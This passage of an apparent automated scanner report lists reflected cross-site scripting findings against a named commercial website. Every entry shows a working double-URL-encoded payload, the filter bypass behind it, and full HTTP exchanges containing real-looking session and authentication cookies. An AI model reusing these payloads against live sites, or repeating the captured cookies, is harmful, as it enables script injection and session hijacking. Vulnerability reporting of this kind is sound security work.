                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/9439c";alert(1)//d5a28f4e792","E404") ;
   </script>
...[SNIP]...

1.23. http://www.sigmaaldrich.com/analytical-chromatography/posters-and-cds.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/posters-and-cds.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14c7d%2522%253balert%25281%2529%252f%252fe3ac5dd71b4 was submitted in the REST URL parameter 1. This input was echoed as 14c7d";alert(1)//e3ac5dd71b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography14c7d%2522%253balert%25281%2529%252f%252fe3ac5dd71b4/posters-and-cds.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:18 GMT
Content-Length: 28950
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography14c7d";alert(1)//e3ac5dd71b4/posters-and-cds.html","E404") ;
   </script>
...[SNIP]...

1.24. http://www.sigmaaldrich.com/analytical-chromatography/posters-and-cds.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/posters-and-cds.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81ff0%2522%253balert%25281%2529%252f%252fb80a4680748 was submitted in the REST URL parameter 2. This input was echoed as 81ff0";alert(1)//b80a4680748 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: the payload above submits %2522 so that the double quote arrives as %22 after the web server's single decode and as a literal " after the application's own second decode, closing the string literal; the same technique passes %253c for the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/81ff0%2522%253balert%25281%2529%252f%252fb80a4680748 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:20 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/81ff0";alert(1)//b80a4680748","E404") ;
   </script>
...[SNIP]...

1.25. http://www.sigmaaldrich.com/analytical-chromatography/sample-preparation.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/sample-preparation.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 45c61%2522%253balert%25281%2529%252f%252febf1f616a2b was submitted in the REST URL parameter 1. This input was echoed as 45c61";alert(1)//ebf1f616a2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: the payload above submits %2522 so that the double quote arrives as %22 after the web server's single decode and as a literal " after the application's own second decode, closing the string literal; the same technique passes %253c for the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography45c61%2522%253balert%25281%2529%252f%252febf1f616a2b/sample-preparation.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28953
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography45c61";alert(1)//ebf1f616a2b/sample-preparation.html","E404") ;
   </script>
...[SNIP]...

1.26. http://www.sigmaaldrich.com/analytical-chromatography/sample-preparation.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/sample-preparation.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6767%2522%253balert%25281%2529%252f%252f898fa123b9b was submitted in the REST URL parameter 2. This input was echoed as a6767";alert(1)//898fa123b9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: the payload above submits %2522 so that the double quote arrives as %22 after the web server's single decode and as a literal " after the application's own second decode, closing the string literal; the same technique passes %253c for the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/a6767%2522%253balert%25281%2529%252f%252f898fa123b9b HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/a6767";alert(1)//898fa123b9b","E404") ;
   </script>
...[SNIP]...

1.27. http://www.sigmaaldrich.com/analytical-chromatography/spectroscopy.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/spectroscopy.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61f4e%2522%253balert%25281%2529%252f%252fe9e12b0b0d7 was submitted in the REST URL parameter 1. This input was echoed as 61f4e";alert(1)//e9e12b0b0d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: the payload above submits %2522 so that the double quote arrives as %22 after the web server's single decode and as a literal " after the application's own second decode, closing the string literal; the same technique passes %253c for the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography61f4e%2522%253balert%25281%2529%252f%252fe9e12b0b0d7/spectroscopy.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:09 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography61f4e";alert(1)//e9e12b0b0d7/spectroscopy.html","E404") ;
   </script>
...[SNIP]...

1.28. http://www.sigmaaldrich.com/analytical-chromatography/spectroscopy.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/spectroscopy.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f392b%2522%253balert%25281%2529%252f%252f68a7435bb01 was submitted in the REST URL parameter 2. This input was echoed as f392b";alert(1)//68a7435bb01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

